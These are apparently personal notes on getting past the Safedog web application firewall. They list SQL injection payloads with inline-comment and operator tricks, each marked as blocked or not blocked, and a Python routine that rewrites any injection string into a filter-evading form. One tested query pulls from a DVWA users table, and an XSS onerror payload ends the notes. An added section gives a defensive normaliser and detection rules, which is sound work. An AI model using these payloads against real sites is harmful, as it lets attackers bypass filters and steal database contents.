1 SQL injection bypass
kobe' and 1=1# triggers Safedog
Construct /!union/ /!select/
union select 1,2
/!union/ /!select/ 1,2
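1' && true#
1' || false#
Send && URL-encoded, using %26 for each &
1' &&1# blocked
1' &&(1)# not blocked
1' xor 1# not blocked
1' xor true# not blocked
1' || 1# blocked
1' || (1)# not blocked
1' || true# not blocked
Bypassing order by
Inline-comment bypass fails
/!order/ /!by/ 2# cannot bypass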
a=/&id=1 union select schema_name from information_schema.schemata--+/
a=/&id=1 union select 1,database()#/
?id=/&id=1 union select 1,database()#/
union//select//1,2#
1' /!union/ /!select/ 1,2#
1' /!50001union////!50001select/ 1,2/!/
Bypass
1' union/!90000aaa/select/!90000aaa/ 1,2#
1' union/90000aaa/select/90000aaa/ 1,2# error
1' union/!90000/select1,2# error
# payload is the injection string to rewrite; it is assumed to be defined by the caller.
if payload:
    # Rewrite whitespace, operators and keywords into the comment-wrapped forms noted above.
    payload = payload.replace(" ", "/!/")
    payload = payload.replace("=", "/!/=/!/")
    payload = payload.replace("AND", "/!/AND/!/")
    payload = payload.replace("UNION", "union/!88888cas/")
    payload = payload.replace("#", "/!/#")
    payload = payload.replace("USER()", "USER/!()/")
    payload = payload.replace("DATABASE()", "DATABASE/!()/")
    payload = payload.replace("--", "/!/--")
    payload = payload.replace("SELECT", "/!88888cas/select")
    payload = payload.replace("FROM", "/!99999c//!99999c/from")
    print(payload)
1' union/!88888cas/ select/!88888cas/ 1,DATABASE/!()/# bypasses
1' union/!999aa/ select/!88888cas/ database/!()/,USER/!()/ /!99999c//!99999c/from dvwa.users#
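Added example (not part of the original notes): the blocked / not blocked results above are what a filter produces when it matches keywords on the raw request text. The sketch below normalizes comments the way the database would read them before any rule runs. It assumes the /!…/ fragments in these notes stand for MySQL executable comments (/*! … */); the server version, rule names, function names and sample strings are hypothetical and constructed for illustration.

```python
import re

# Assumption: the protected backend is MySQL 8.0.36 (version id 80036).
SERVER_VERSION = 80036

# MySQL executable comment: /*!body*/ or /*!NNNNNbody*/ (version-gated).
_EXEC = re.compile(r"/\*!(\d{5,6})?(.*?)\*/", re.S)
# Ordinary comment: /* anything */
_PLAIN = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule set, applied to the normalized text only.
_RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "info-function": re.compile(r"\b(?:database|user)\s*\("),
    # Optional "(" so that "|| (1)" is treated like "|| 1".
    "boolean-tautology": re.compile(
        r"(?:&&|\|\||\b(?:and|or|xor)\b)\s*\(?\s*(?:1|true|false)\b"),
}

def normalize(sql, server_version=SERVER_VERSION):
    """Rewrite comments the way the server would see the statement."""
    def unwrap(match):
        version, body = match.group(1), match.group(2)
        if version and int(version) > server_version:
            return " "            # gate not met: server ignores the body
        return " " + body + " "   # gate met or absent: body is executed
    sql = _EXEC.sub(unwrap, sql)  # must run before the plain-comment pass
    sql = _PLAIN.sub(" ", sql)
    return re.sub(r"\s+", " ", sql).strip().lower()

def detect(sql):
    """Return the sorted names of the rules that match after normalization."""
    canon = normalize(sql)
    return sorted(name for name, rule in _RULES.items() if rule.search(canon))

# Constructed samples modelled on the request forms in these notes.
SAMPLES = [
    "1' union/*!90000aaa*/select/*!90000aaa*/ 1,2#",
    "1' /*!50001union*/ /*!50001select*/ 1,DATABASE/*!()*/#",
    "1' || (1)#",
    "kobe",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(detect(sample), "<-", sample)
```

Pattern matching of this kind is a second line of defence; parameterized queries in the application remove the injection point itself.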
2 XSS bypass
https://www.uedbox.com/post/54859/
<audio src=x onerror=prompt('xss')>